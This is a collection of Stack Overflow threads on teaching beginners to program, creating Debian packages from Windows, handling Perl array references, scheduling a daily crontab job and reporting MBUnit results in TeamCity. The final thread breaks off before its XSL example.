>>> def square(length):
down()
for i in range(4):
forward(length)
right(90)
>>>
>>> #HAVE STUDENTS PREDICT WHAT THIS WILL DRAW
>>> for i in range(50):
up()
left(90)
forward(25)
square(i)
>>>
>>> #NOW HAVE THE STUDENTS WRITE CODE TO DRAW
>>> #A SQUARE 'TUNNEL' (I.E. CONCENTRIC SQUARES
>>> #GETTING SMALLER AND SMALLER).
>>>
>>> #AFTER THAT, MAKE THE TUNNEL ROTATE BY HAVING
>>> #EACH SUCCESSIVE SQUARE TILTED
In trying to accomplish the last two assignments, they will have many failed attempts, but the failures will be visually interesting and they'll learn quickly as they try to figure out why it didn't draw what they expected.
A: I've had to work with several beginner (never wrote a line of code) programmers, and I'll be doing an after school workshop with high school students this fall. This is the closest thing I've got to documentation. It's still a work in progress, but I hope it helps.
1) FizzBuzz. Start with command line programs. You can write some fun games, or tools, very quickly, and you learn all of the language features very quickly without having to learn the GUI tools first. These early apps should be simple enough that you won't need to use any real debugging tools to make them work.
If nothing else things like FizzBuzz are good projects. Your first few apps should not have to deal with DBs, file system, configuration, ect. These are concepts which just confuse most people, and when you're just learning the syntax and basic framework features you really don't need more complexity.
Some projects:
*
*Hello World!
*Take the year of my birth, and calculate my age (just (now - then) no month corrections). (simple math, input, output)
*Ask for a direction(Up, down, left, right), then tell the user their fate (fall in a hole, find a cake, ect). (Boolean logic)
*FizzBuzz, but count once every second. (Loops, timers, and more logic)
*Depending on their age some really like an app which calls the users a random insult at some interval. (Loops, arrays, timers, and random if you make the interval random)
2) Simple Project Once they have a good grasp of language features, you can start a project(simple, fun games work good.). You should try to have the first project be able to be completed within 6-12 hours. Don't spend time to architect it early. Let them design it even if it sucks. If it falls apart, talk about what happened and why it failed, then pick another topic and start again.
This is where you start introducing the debugging capabilities of your tools. Even if you can see the problem by reading the code you should teach them how to use the tools, and then show them how you could see it. That serves the dual purpose of teaching the debugging tools and teaching how to ID errors without tools.
Once, or if, the project gets functional you can use it to introduce refactoring tools. Its good if you can then expand the project with some simple features which you never planned for. This usually means refactoring and significant debugging, since very few people write even half decent code their first time.
Some projects:
*
*Hangman game
*Experimenting with robotics(Vex and Mindstorms are options)
3) Real Project Start a real project which may take some time. Use proper source control, and make a point to have a schedule. Run this project like a real project, if nothing else its good experience having to deal with the tools.
Obviously you need to adjust this for each person. The most important thing I've found is to make even the first simple apps apply to what the person is interested in.
Some projects:
*
*Tetris
*Text file based blog engine
*More advanced robotics work
A: The key thing is that the person in question needs to have some problem that they want solving. If you don't have a program that you want to write (and something sensible and well-defined, not "I want to write the next Quake!") then you can't learn to program, because you have nothing to motivate you. I mean, you could read a book and have a rough understanding of a language's syntax and semantics, but until you have a program that you want written you'll never grasp the nettle.
If that impetus exists then everything else is just minor details.
A: If you want to teach the basics of programming, without being language specific, there is an application called Scratch that was created in MIT. It's designed to help people develop programming skills. As users create Scratch projects, they learn to create conditions, loops, etc. There is a also a community of scratch projects, form which projects can be downloaded - that way you can explore other people's programs and see how they were built.
A: I think that once he has the basics (variables, loops, etc) down you should try to help him find something specific that he is interested in and help him learn the necessities to make it happen. I know that I am much more inclined and motivated to do something if it's of interest to me. Also, make sure to let him struggle though some of the tougher problems, nothing is more satisfying than the moment you figure it out on your own.
A: I was taught by learning how to solve problems in a language agnostic way using flowcharts and PDL (Program Design Language). After a couple weeks of that, I learned to convert the PDL I had written to a language. I am glad I learned that way because I have spent the majority of my years programming, solving problems without being tied to a language. What language I use has always been an implementation detail and not part of the design.
Having to solve the problem by breaking it down into it's basic steps is a key skill. I think it is one of the things that separates those that can program from those that can't.
As far as how you tackle the order of concepts of a language I believe the easiest way is to decide that is to have a project in mind and tackle the concepts as they are needed. This lets you apply them as they are needed on something that you are interested in doing. When learning a language it is good to have several simple projects in mind and a few with progressive complexity. Deciding on those will help you map out the concepts that are needed and their order.
A: I would recommend also watching some screencasts - they are generally created in context of a specific technology not a language, though if there's Python code displayed, that'll do :). The point is - they're created by some good programmers and watching how good programmers program is a good thing. You and your brother could do some peer programming as well, that might be an even better idea. Just don't forget to explain WHY you do something this way and not that way.
I think the best way to learn programming is from good examples and try not to even see the bad ones.
A: Robert Read wrote a useful guide, How to be a Programmer, which covers a wide area of programming issues that a beginner would find helpful.
A: There have already been a bunch of great answers, but for an absolute beginner, I would wholeheartedly recommend Hackety Hack. It was created by the unreasonably prolific why_the_lucky_stiff specifically to provide a BASIC/LOGO/Pascal-like environment for new programmers to experiment in. It's essentially a slick Ruby IDE with some great libraries (flash video, IM, web server) and interactive lessons. It makes a good pitch for programming, as it chose lessons that do fun, useful things. "Hello, world" may not impress right off the bat, but creating a custom IM client in 20 minutes can inspire someone to keep learning. Have fun!
A: Copy some simple code line by line and get them to read and interpret it as they go along. They will soon work it out. I started programming on an Acorn Electron with snippets of code from Acorn magazines. I had no idea about programming when I was 6, I used to copy the text, but gradually I learnt what the different words meant.
A: This may sound dumb, but why are YOU trying to teach your brother to program?
Often the best learning environment consists of an goal that can be achieved by a keen beginner (a sample program), an ample supply of resources (google/tutorials/books), and a knowledgeable source of advice that can provide guidance when needed.
You can definitely help with suggestions for the first two, but the last is your primary role.
A: I'd suggest taking an approach similiar to that of the book, Accelerated C++ in which they cover parts of C++ that are generally useful for making simple programs. For anyone new to programming I think having something to show for a little amount of effort is a good way to keep them interested. Once you have covered the fundamentals of Python then you should sit back and let him experiement with the language.
In one of my University subjects for this semester they have taken an approach called Problem Based Learning(PBL) in which they use lectures to stimulate students about different approaches to problems. Since your brother is keen you should take a similiar approach. Set him small projects to work on and let him figure it out for himself. Then once he is finished you can go through his approach and compare and contrast with different methods.
If you can give him just the right amount of help to steer him in the right direction then he should be fine. Providng him with some good websites and books would also be a good idea.
I'd also recommend sticking away from IDE's at the starting stages. Using the command line and a text editor will give him a greater understanding of the processes involved in compiling/assembling code.
I hope I've been of some help. :)
A: Plenty of things tripped me up in the beginning, but none more than simple mechanics. Concepts, I took to immediately. But miss a closing brace? Easy to do, and often hard to debug, in a non-trivial program.
So, my humble advice is: don't understimate the basics (like good typing). It sounds remedial, and even silly, but it saved me so much grief early in my learning process when I stumbled upon the simple technique of typing the complete "skeleton" of a code structure and then just filling it in.
For an "if" statement in Python, start with:
if :
In C/C++/C#/Java:
if ()
{
}
In Pascal/Delphi:
If () Then
Begin
End
Then, type between the opening and closing tokens. Once this becomes a solid habit, so you do it without thinking, more of the brain is freed up to do the fun stuff. Not a very flashy bit of advice to post, I admit, but one that I have personally seen do a lot of good!
Edit: [Justin Standard]
Thanks for your contribution, Wing. Related to what you said, one of the things I've tried to help my brother remember the syntax for python scoping, is that every time there's a colon, he needs to indent the next line, and any time he thinks he should indent, there better be a colon ending the previous line.
A: How about this: Spawning the next generation of hackers by Nat Torkington.
A: There is a book called Code. I can't remember who wrote it, but it goes through the basics of a lot of stuff that we (programmers) know and take for granted that people we talk to know also. Everything from how do you count binary to how processors work. It doesn't have anything dealing with programming languages in it (well from what I remember), but it is a pretty good primer. I will admit that I am also of the school that believes you have to know how the computer works to be able to effectively program things for it.
A: Python is easy for new developers to learn. You don't get tangled up in the specifics of memory management and type definition. Dive Into Python is a good beginners guide to python programming. When my sister wanted to learn programing I pointed her to the "Head Start" line of books which she found very easy to read and understand. I find it's hard to just start teaching someone because you don't have a lexicon to use with them. First have him read a few books or tutorials and ask you for questions. From there you can assign projects and grade them. I find it hard to teach programming because I learned it over nearly 15 years of tinkering around.
A: Project Euler has a number of interesting mathematics problems that could provide great material for a beginning programmer to cut her teeth on. The problems begin easy and increase in difficulty and the web is full of sample solutions in various programming languages.
A: I'd recommend Charles Petzold's book Code - The Hidden Langauge of Computer Hardware and Software as an excellent general introduction to how computers work.
There's a lot of information in the book (382 pages) and it may take an absolute beginner some time to read but it's well worth it. Petzold manages to explain many of the core concepts of computers and programming from simple codes, relays, memory, CPUs to operating systems & GUIs in a very clear and enjoyable way. It will provide any reader with a good sense of what's actually happening behind the scenes when they write code.
I certainly wish it was around when I was first learning to program!
A: I don't know for sure what will be the best for your brother, but I know I started with python. I've been playing various games from a very early age and wanted to make my own, so my uncle introduced me to python with the pygame library. It has many tutorials and makes it all easy (WAY easier than openGL in my opinion).
It is limited to 2d, but you should be starting out simple anyway.
My uncle recommended python because he was interested in it at the time, but I recommend it, now fairly knowledgeable, because it's easy to learn, intuitive (or as intuitive as a programming language can get), and simple (but certainly not simplistic).
I personally found basic programming simply to learn programming obscenely boring at the time, but picked up considerable enthusiasm as I went. I really wanted to be learning in order to build something, not just to learn it.
A: Begin by asking him this question: "What kinds of things do you want to do with your computer?"
Then choose a set of activities that fit his answer, and choose a language that allows those things to be done. All the better if it's a simple (or simplifiable) scripting environment (e.g. Applescript, Ruby, any shell (Ksh, Bash, or even .bat files).
The reasons are:
*
*If he's interested in the results, he'll probably be more motivated than if you're having him count Fibonacci's rabbits.
*If he's getting results he likes, he'll probably think up variations on the activities you create.
*If you're teaching him, he's not pursuing a serious career (yet); there's always time to switch to "industrial strength" languages later.
A: A good resource to teach young people is the free eBook "Invent your own games with Python":
http://pythonbook.coffeeghost.net/book1/IYOCGwP_book1.pdf
A: If he is interested than I wouldn't worry about focusing on games or whatnot. I'd just grab that beginners 'teach yourself x' book you were about to throw and give it him and let him struggle through it. Maybe talk about it after and then do another and another. After then I'd pair program with him so he could learn how shallow and lame those books he read were. Then I'd start having him code something for himself. A website to track softball stats or whatever would engage him. For me it was a database for wine back in the day.
After that I would start in on the real books, domain design, etc.
A: I skimmed through the comments and looks like nobody mentioned Foundations of Programming from www.CodeBetter.com. Although it requires a bit of foundation, it can certainly be a next step in the learning process.
A: Once he has the basics, I suggest the Tower of Hanoi as a good exercise.
I recommend beginning with the wooden toy if you have one; let him try to solve the problem by himself and describe his method in a systematic way. Show him where recursion comes into play. Explain him how the number of moves depends on the number of disks.
Then let him write a program to print the sequence of moves, in your language of choice.
A: Very good video introduction course by Stanford university (no prior knowledge required):
Programming Methodology
Will teach you good "methodologies" every programmer should know and some Java programming.
A: Book: Java Programming for Kids, Parents and Grandparents (PDF)
I don't have personal experience about learning using that book, but it appears to be nice because it quickly goes into producing something visible, and not spending too much time with the syntactic itty bitty details. Has someone here tried using that book?
A: once you've taught them how to program, they might want to learn how to develop software..
for that I think Greg Wilson's Software Carpentry course is great.. it also uses Python as the student's language.
A: I think Python is a really great Language to start with: :-)
I suggest you to try http://www.pythonchallenge.com/
It is build like a small Adventure and every Solutions links you to a new nice Problem.
After soluting the Problem you get access to a nice Forum to talk about your Code and get to see what other people created.
A: I can recommend my project, PythonTurtle.
Summary:
PythonTurtle strives to provide the lowest-threshold way to learn Python. Students command an interactive Python shell (similar to the IDLE development environment) and use Python functions to move a turtle displayed on the screen. An illustrated help screen introduces the student to the basics of Python programming while demonstrating how to move the turtle.
It looks like this:
alt text http://www.pythonturtle.com/screenshot.gif
A: Try to find a copy of Why's (Poignant) Guide to Ruby online. The original site is offline but I'm sure there are a few mirrors out there. It's not your typical programming guide; it puts a unique (and funny) spin on learning a new language that might suit your friend. Not to mention, Ruby is a great language to learn with.
A: Academic Earth offers links to free Computer Science courses from top universities. They have a section geared towards Beginning Computer Science. The languages taught in the beginning courses vary:
*
*MIT - Introduction to Computer Science and Programming - Python
*Stanford - Computer Science I: Programming Methodology - Java
*Harvard - Introduction to Computer Science I - C (main focus),
with a few others sprinkled in for
good measure (e.g., SQL, PHP, LISP,
Assembler, etc.)
*Berkeley - a dialect of the LISP language
A: I would actually argue to pick a simpler language with fewer instructions. I personally learned on BASIC at home, as did Jeff. This way, you don't have to delve into more complicated issues like object oriented programming, or even procedures if you don't want to. Once he can handle simple control flow, then move on to something a little more complicated, but only simple features.
Maybe start with very simple programs that just add 2 numbers, and then grow to something that might require a branch, then maybe reading input and responding to it, then some kind of loop, and start combining them all together. Just start little and work your way up. Don't do any big projects until he can grasp the fundamentals (otherwise it may very well be too daunting and he could give up midway). Once he's mastered BASIC or whatever you choose, move on to something more complicated.
Just my $0.02
A: I think the "wisdom of crowds" work here. How did most people learn how to program? Many claim that they did so by copying programs of others, usually games they wanted to play in BASIC.
Maybe that route will work with him too?
A: I agree with Leac. I actually play with Scratch sometimes if I'm bored. It's a pretty fun visual way of looking at code.
How it works is, they give you a bunch of "blocks" (these look like legos) which you can stack. And by stacking these blocks, and interacting with the canvas (where you put your sprites, graphics), you can create games, movies, slideshows... it's really interesting.
When it's complete you can upload it right to the Scratch websites, which is a youtube-ish portal for Scratch applications. Not only that, but you can download any submission on the website, and learn from or extend other Scratch applications.
A: I recommend starting them off with C/C++. I find that it is a good foundation for just about every other language. Also, the different versions of BASIC can be pretty dodgy, at best, and have no real correlation to actual programming.
A: I think learning to program because you want to learn to program will never be as good as learning to program because you want to DO something. If you can find something that your brother is interested in making work because he wants to make it work, you can just leave him with Google and he'll do it. And he'll have you around to check he's going along the right path.
I think one of the biggest problems with teaching programming in the abstract is that it's not got a real-world context that the learner can get emotionally invested in. Programming is hard, and there has to be some real payoff to make it worth the effort of doing it. In my case, I'd done computer science at uni, learned Pascal and COBOL there, and learned BASIC at home before that, but I never really got anywhere with it until I became a self-employed web designer back in the 90s and my clients needed functionality on their web sites, and were willing to pay about 10x more for functionality than for design. Putting food on the table is a hell of a motivator!
So I learned Perl, then ASP/VBScript, then JavaScript, then Flash/ActionScript then PHP - all in order to make the stuff I wanted to happen.
A: First off, I think there has already been some great answers, so I will try not to dupe too much.
*
*Get them to write lots of code, keep them asking questions to keep the brain juices flowing.
*I would say dont get bogged down with the really detailed information until they either run in to the implications of them, or they ask.
I think one of the biggest points I would ensure is that they understand the core concepts of a framework. I know you are working in Python (which I have no clue about) but for example, with ASP.NET getting people to understand the page/code behind model can be a real challenge, but its critical that they understand it. As an example, I recently had a question on a forum about "where do I put my data-access code, in the 'cs' file or the 'aspx' file".
So I would say, for the most part, let them guide the way, just be there to support them where needed, and prompt more questions to maintain interest. Just ensure they have the fundamentals down, and dont let them run before they can walk.
Good Luck!
A: I would recommend in first teaching the very basics that are used in almost every language, but doing so without a language. Outline all the basic concepts If-Else If-Else, Loops, Classes, Variable Types, Structures, etc. Everything that is the foundation of most languages. Then move onto really understanding Boolean, comparisons and complex AND OR statements, to get the feeling on what the outcomes are for more complex statements.
By doing it this way he will understand the concepts of programming and have a much easier time stepping into languages, from there its just learning the intricate details of the languages, its functions, and syntax.
A: My favourite "start learning to code" project is the Game Snakes or Tron because it allows you to start slow (variables to store the current "worm position", arrays to store the worm positions if the worm is longer than one "piece", loops to make the worm move, if/switch to allow the user to change the worm's direction, ...). It also allows to include more and more stuff into the project in the long run, e.g. object oriented programming (one worm is one object with the chance to have two worms at the same time) with inheritance (go from "Snakes" to "Tron" or the other way around, where the worm slightly changes behavior).
I'd suggest that you use Microsoft's XNA to start. In my experience starting to program is much more fun if you can see something on your screen, and XNA makes it really easy to get something moving on the screen. It's quite easy to do little changes and get another look, e.g. by changing colors, so he can see that his actions have an effect -> Impression of success. Success is fun, which is a great motivation to keep on learning.
A: This thread is very useful to me as a beginner (>100 lines of code) programmer.
Based on what I have been through, once I finished with the "Hello World" and move to variables and "if/else" statement, I got zapped with too much syntax; not knowing what to do with them.
So with an interesting simple project, I might get my interest up again. There are quite alot of project suggestions here.
Can I ask a questions here?
Is it better to learn a scripting language like Autohotkey first?
Edit: [Justin Standard]
I think learning something macro-based like Autohotkey will only help minimally. Try learning a "real" programming language first. The easiest to get started with (according to most people) are python and ruby. I favor python, but both are pretty simple.
There is also a full stackoverflow post that answers the question of which language to start with.
A: At first I was interested in how different programs worked, so I started by looking at the source code. Then when I began to understand how the program worked, I would change certain parameters to see what would happen. So basically I learned how to read before I learned how to write. Which coincidently is how most people learn English.
So if I was trying to teach someone how to program I would give them a small program to try to read and understand how it works, and have them just just play around with the source code.
Only then would I give them "assignments" to try to accomplish.
Now if they had a particular reason for wanting to learn how to program, it would certainly be a good idea to start with something along the lines of what they want to accomplish. For example if they wanted to be proficient in an application like blender, it would definably be a good idea to start with Alice.
I would absolutely recommend sticking with a language that has garbage collection, like D, Perl, or some interpreted language like javascript. It might be a good idea to stay away from Perl until Perl 6 is closer to completion, because it fixes some of the difficulties of reading and understanding Perl.
A: My personal experience started back in elementary using Logo Writer (which in a way has evolved into Scratch), granted I was a little kid and computers where not as awesome as they are nowadays, but for the time being it took me places I hadn't been before... I think that's how I got hooked in the business... I could say that it was these first impressions based on such simplicity and coolness that made the goods that stick into my head for life. That's how basics in teaching programming should be taught... a simple process that yearns magic.
Back to my first CS 101, I started with notions of what an algorithm was by building a Tequila Sunrise (a step by step process that could be repeated at any time with the right ingredients, that will result in the same output), from there we move on to basic math functions using Scheme (like EHaskins was saying... start small and then build up), and from there to notions of loops, Boolean logic, structures and then building into concepts of objects and some simulation executions...
One of the good things about this approach is that language was not a goal but just a tool in the process of learning the concepts and basics of programming (just like operators, functions and else are in mathematics).
IMHO learning the basics of programming and creating a foundation is probably the best thing you could teach your brother, once the goal is covered then u can move on into a more general use language like python and teach them higher concepts like architecture and design patterns (make them natural in the process so he will get use to good practices from early stages and will see them as part of the process)... we are far from reinventing the warm water, but we always have to start by creating fire.
From there on the sky is the limit!
A: In my biased opinion, C is the best point to start. The language is small, it's high level features are ubiquitous and the low level features let you learn the machine.
I found the C Primer Plus, 5th Edition very helpful as a beginning programmer with almost no programming experience. It assumes no prior programming experience, fun to read and covers C in depth (including the latest C99 standard).
A: For me, exploring and experimenting within the IDE itself helped me to learn Java and Visual Basic, but I learnt the basics of programming the hard way: Perl 5. There wasn't a free IDE back then, so it meant typing codes into Notepad, saving it, and then run the perl interpreter.
I'd say that IDEs make learning the basics of programming easier. Try playing around with control structures and variables first. Say in Java:
int a = 5;
for (int i = 0; i < a; i++) {
System.out.println("i is now " + i);
}
Basically, simply learning the control structures and variables would allow a beginner to start coding fun stuff already.
A: The best way to learn anything is to start with the basic. You can find any good text book to explain what programming is, memory, algorithms.
The next step select the language which it just depends on what the teacher knows or why the student wants to learn.
Then it is just code, code, code. Code every example right from the book. Then change it slightly to do another action. Learning to program is an active process not a passive one. You can't just read C++ How to Program by Dietal and then expect to code C++ without having actively done it while reading.
Even if you are an experienced coder it helps to write the code in the book to learn something new.
A: Something to consider ... not everyone is capable of programming:
Some people just cannot get past things like:
A = 1
B = 2
A = B
(these people will still think A = 1)
Jeff has talked about this too. In fact, my example is in the link (and explained, to boot).
A: It may seem weird, but I got started writing code by automating the tasks and data analysis at my former job. This was accomplished by recording then studying the code an Excel macro generated. Of course this approach assumes you can learn via VB.
A: Some additional information that someone could attach to Jason Pratt's earlier post on Alice ... specifically, a Storytelling Alice variant.
Although the study presented targets middle school girls, you may find the white paper written by Caitlin Kelleher interesting.
A: One I used with my kids is CEEBot. It's not python, but it teaches C / Java style programming in a fun, robot-programming kind of game. It is aimed at 10-15 year olds, but it is a really good one.
A: Having small, obtainable goals is one of the greatest ways to learn any skill. Programming is no different. Python is a great language to start with because it is easy to learn, clean and can still do advanced things. Python is only limited by your imagination.
One way to really get someone interested is to give them small projects that they can do in an hour or so. When I originally started learning python I playing Code Golf. They have many small challenges that will help teach the basics of programming. I would recommend just trying to solve one of the challenges a day and then playing with the concepts learned. You've got to make learning to program fun or the interest will be lost very quickly.
A: As a non-programmer myself, I found the book "How to Program" from Pragmatic Programmers very helpful from a rudimentary standpoint. It's approachable and easy to read for a beginner. It won't take you from beginner to expert, but it will prepare you for what to do once you pick a language and pick up your first "Learn to Program in (language here)" book.
A: A couple of other starting platforms:
*
*A good programmable calculator (that's what I learnt on back in the 70s), and HP25 then HP41, now TI69, etc.
*Interactive Fiction platforms, like "Inform 7" provide another angle on the whole thing
*Flash/ActionScript
All of these are different and engaging, and any one of these might spark the kind of interest that is required to get a beginner of and running.
LBB
A: I'd recommend Think Python.
A: Your question quite depends on age and education of your brother, but if he is a child/teenager, I would recommend to do some GUI programming or graphic programming first (with Canvas etc.). It looks good, and you have immediate results. Algorithms are boring, and too abstract for young people (before say 15 years old).
When I started programming on ZX Spectrum (I was like 12 years old), I liked to draw various things on the screen, and it was still interesting. I didn't learn about real algorithmic techniques until I was maybe 18. Don't be mislead that such "simple" programming is a wrong start; the interest of the person learning it is the most important part of it.
So, I would look into PyKDE, PyGTK, PyQt or Python + OpenGL (there are certainly some tutorials on the net, I know of some Czech ones but that won't help you :)).
Of course, if your brother is older and has education close to mathematics, you can head directly to algorithms and such.
A: Whatever language and environment you choose, if the student wants to learn for professional reasons or to do "real" programming (whatever that is), have them start by writing their starter programs1 on paper and taking them away to run. Come back with the output and/or error results and have them fix things on paper.
This isn't especially harder at first than doing it on-screen and hitting run, but it will make things much easier when they start to discover the wonderful world of bugs.
1) short, "Hello, World!"-type programs that still have some logic and/or calculations, do this up to a few programs that can have bugs
A: Whatever they write, have them step through it in a debugger line-by-line on the first run. Let them see for themselves what the computer is doing. This takes a lot of mystery out of things, reduces intimidation ("oh, each line really is that simple!"), and helps them learn debugging skills and recognize why common errors are common (and why they're errors)
A: +1 to Stanford university lectures. http://see.stanford.edu/see/courseinfo.aspx?coll=824a47e1-135f-4508-a5aa-866adcae1111
They're simple, of high quality and I can vouch for their ability to teach beginners(me being one of them).
A: I suggest "Computer Science Unplugged" as a complementary didactical material.
A: "Who's Afraid of C++"
By Heller
Might be worth a shot
A: Microsoft Small Basic is a free .NET based programming environment aimed to be a "fun" learning environment for beginners. The language is a subset of VB.NET and even contains a "Turtle" object familiar from the Logo language. The website contains a step-by-step tutorial.
A: I agree with superjoe30 above, but I don't have enough reputation yet to leave a comment.
I was a C.S. professor for 4 years. The languages were Basic, and then Pascal, but it doesn't really matter what the language is.
The biggest lesson I learned as a new prof was, no matter how simple I thought a concept was, it is not simple to a newbie. Never go any faster than your student can go. I can't emphasize that enough. Go really, really slow.
I would start with very simple stuff, read and print, maybe a simple calculation, just to get the student used to putting something in and getting something out. Then IF statements. Then really simple FOR loops, always in terms of something the student could write and have some fun with.
Then I would spend about 3 weeks teaching a very simple sort of machine language for a phony decimal machine called SIMPL, that you could single-step. The reason for doing this so the student could see where the "rubber meets the road", that computers do things step-by-step, and it makes a difference what order things happen in. Without that, students tend to think the computer can sort of read their mind and do everything all at once.
Then back to Basic. A couple weeks on arrays, because that is a big speed bump. Then sequential files, which is another speed bump. What I mean by "speed bump" is the student can be sailing along feeling quite confident, and then you hit them with a concept like arrays, and they are totally lost again, until you ease them through it.
Then, with those skills under their belts, I would have them pick a term project, because that is what makes programming interesting. Without a use for it, it's really boring. I would suggest a variety of projects, such as games, accounting programs, science programs, etc. It's really great to see them get turned on. Often they would ask me for help, and that's great, because you know they're learning.
While they were doing their projects, we would continue to cover more advanced programming techniques - searching, sorting, merging, how to make a simple database, etc.
Good luck. Teaching is hard work but satisfying when you see students grow.
A: Use real world analogy and imaginary characters to teach them programming. Like when I teach people about variables and control statements etc.
Usually I start with calculator example. I say imagine u have a box for every variable and u have 10 card boards with numbers 0 - 9 printed on them. Say that the box can hold one cardboard at a time and similar ways to explain how programming elements work
And emphasis on how every operator works.. like the simple '=' operator always computes the right hand side first into one value. and put that value into box named "num_1" (which is variable name)
This has been very very effective, as they are able to imagine the flow very quickly.
A: Ask your brother if there's something he'd like to make a program do or invent a project for him that you think would interest him.
Something where he can know what the output is supposed to be and point him to the materials(on-line or in print) pertinent to the project. If he's coming into python or programming 'cold' be patient as he works his way through understanding the basics such as syntax, errors, scoping and be prepared to step aside and let him run and make his own mistakes when you start to see the light bulb go on over his head.
A: I highly recommend Python Programming: An Introduction to Computer Science 2nd Edition by John Zelle. It is geared towards beginners, and deals with the semantics of programming. After reading you will be able to pick up other languages much faster because of Zelle's semantic vs. syntactic approach. Check it out!
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3088",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "324"
} |
Q: How can I create Debian install packages in Windows for a Visual Studio project? I'm developing some cross platform software targeting Mono under Visual Studio and would like to be able to build the installers for Windows and Linux (Ubuntu specifically) with a single button click. I figure I could do it by calling cygwin from a post-build event, but I was hoping for at best a Visual Studio plugin or at worst a more Windows-native way of doing it. It seems like the package format is fairly simple and this must be a common need.
edit: Re-asked question under other account due to duplicate login issue.
A: Debian's .deb packages are just "ar" archives containing tarballs. You can manipulate both types of files using cygwin or msys quite easily:
$ ar xv asciidoc_8.2.1-2_all.deb
x - debian-binary
x - control.tar.gz
x - data.tar.gz
$ tar -tzf control.tar.gz
./
./conffiles
./md5sums
./control
Or you can install all the "standard" Debian stuff using cygwin, I suppose, but most of that stuff won't benefit you much if you're building a .Net app anyway.
A: If you use the .NET Core SDK, you can use dotnet-packaging tools to create a Debian installer package from any platform that runs .NET Core.
For example, running dotnet deb -c Release -f netcoreapp2.1 -r ubuntu.16.04-x64 would then create a .deb file which you can use to install your app on Ubuntu 16.04.
The project repository has more details.
A: I am not aware of any plugin that does it natively, especially since Mono users seem to prefer MonoDevelop.
However, it should be possible to use Cygwin and a custom MSBuild Task or Batch file in order to achieve that by using the native .deb creation tools.
A:
this must be a common need.
Some small percentage of software developers develop for .NET
Some very small percentage of that group develop for mono
Some small percentage of that group wants to provide .debs instead of just a zip
Some very small percentage of that group wants to build their linux apps on windows instead of natively on linux
It's just you :-)
A: If you don't mind using Java tools it's possible to build Debian packages with jdeb in an Ant script. That's probably lighter than relying on Cygwin.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3106",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "22"
} |
Q: Can you force either a scalar or array ref to be an array in Perl? I have a perl variable $results that gets returned from a service. The value is supposed to be an array, and $results should be an array reference. However, when the array has only one item in it, $results will be set to that value, and not a referenced array that contains that one item.
I want to do a foreach loop on the expected array. Without checking ref($results) eq 'ARRAY', is there any way to have something equivalent to the following:
foreach my $result (@$results) {
# Process $result
}
That particular code sample will work for the reference, but will complain for the simple scalar.
EDIT: I should clarify that there is no way for me to change what is returned from the service. The problem is that the value will be a scalar when there is only one value and it will be an array reference when there is more than one value.
A: im not sure there's any other way than:
$result = [ $result ] if ref($result) ne 'ARRAY';
foreach .....
A: Well if you can't do...
for my $result ( ref $results eq 'ARRAY' ? @$results : $results ) {
# Process result
}
or this...
for my $result ( ! ref $results ? $results : @$results ) {
# Process result
}
then you might have to try something hairy scary like this!....
for my $result ( eval { @$results }, eval $results ) {
# Process result
}
and to avoid that dangerous string eval it becomes really ugly fugly!!....
for my $result ( eval { $results->[0] } || $results, eval { @$results[1 .. $#{ $results }] } ) {
# Process result
}
PS. My preference would be to abstract it away in sub ala call_to_service() example given by reatmon.
A: Another solution would be to wrap the call to the server and have it always return an array to simplify the rest of your life:
sub call_to_service
{
my $returnValue = service::call();
if (ref($returnValue) eq "ARRAY")
{
return($returnValue);
}
else
{
return( [$returnValue] );
}
}
Then you can always know that you will get back a reference to an array, even if it was only one item.
foreach my $item (@{call_to_service()})
{
...
}
A: I would re-factor the code inside the loop and then do
if( ref $results eq 'ARRAY' ){
my_sub($result) for my $result (@$results);
}else{
my_sub($results);
}
Of course I would only do that if the code in the loop was non-trivial.
A: I've just tested this with:
#!/usr/bin/perl -w
use strict;
sub testit {
my @ret = ();
if (shift){
push @ret,1;
push @ret,2;
push @ret,3;
}else{
push @ret,"oneonly";
}
return \@ret;
}
foreach my $r (@{testit(1)}){
print $r." test1\n";
}
foreach my $r (@{testit()}){
print $r." test2\n";
}
And it seems to work ok, so I'm thinking it has something to do with the result getting returned from the service?
If you have no control over the returning service this might be hard one to crack
A: You can do it like this:
my @some_array
push (@some_array, results);
foreach my $elt(@some_array){
#do something
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3112",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "28"
} |
Q: How to setup a crontab to execute at specific time How can I set up my crontab to execute X script at 11:59PM every day without emailing me or creating any logs?
Right now my crontab looks something like this
@daily /path/to/script.sh
A: Following up on svrist's answer, depending on your shell, the 2>&1 should go after > /dev/null or you will still see the output from stderr.
The following will silence both stdout and stderr:
59 23 * * * /usr/sbin/myscript > /dev/null 2>&1
The following silences stdout, but stderr will still appear (via stdout):
59 23 * * * /usr/sbin/myscript 2>&1 > /dev/null
The Advanced Bash Scripting Guide's chapter on IO redirection is a good reference--search for 2>&1 to see a couple of examples.
A: You will with the above response receive email with any text written to stderr. Some people redirect that away too, and make sure that the script writes a log instead.
... 2>&1 ....
A: When you do crontab -e, try this:
59 23 * * * /usr/sbin/myscript > /dev/null
That means: At 59 Minutes and 23 Hours on every day (*) on every month on every weekday, execute myscript.
See man crontab for some more info and examples.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3136",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "18"
} |
Q: Using MBUnit in TeamCity I'm compiling a NAnt project on linux with TeamCity Continuous Integration server. I have been able to generate a test report by running NAnt on mono thru a Command Line Runner but don't have the options of using the report like a NAnt Runner. I'm also using MBUnit for the testing framework.
How can I merge in the test report and display "Tests failed: 1 (1 new), passed: 3049" for the build?
Update: take a look at MBUnitTask its a NAnt task that uses sends messages that TeamCity expects from NUnit so it lets you use all of TeamCity's features for tests.
MBUnitTask
Update: Galio has better support so you just have to reference the Galio MBUnit 3.5 dlls instead of the MBUnit 3.5 dlls and switch to the galio runner to make it work.
A: Gallio now has an extension to output TeamCity service messages.
Just use the included Gallio.NAntTasks.dll and enable the TeamCity extension. (this won't be necessary in the next release)
A: TeamCity watches the command line output from the build. You can let it know how your tests are going by inserting certain markers into that output See http://www.jetbrains.net/confluence/display/TCD3/Build+Script+Interaction+with+TeamCity. For example
##teamcity[testSuiteStarted name='Test1']
will let TeamCity know that a set of tests started. With MbUnit you can't output these markers while the tests are running, but you can transform the XML file that it outputs. Here is the XSL that I am using:
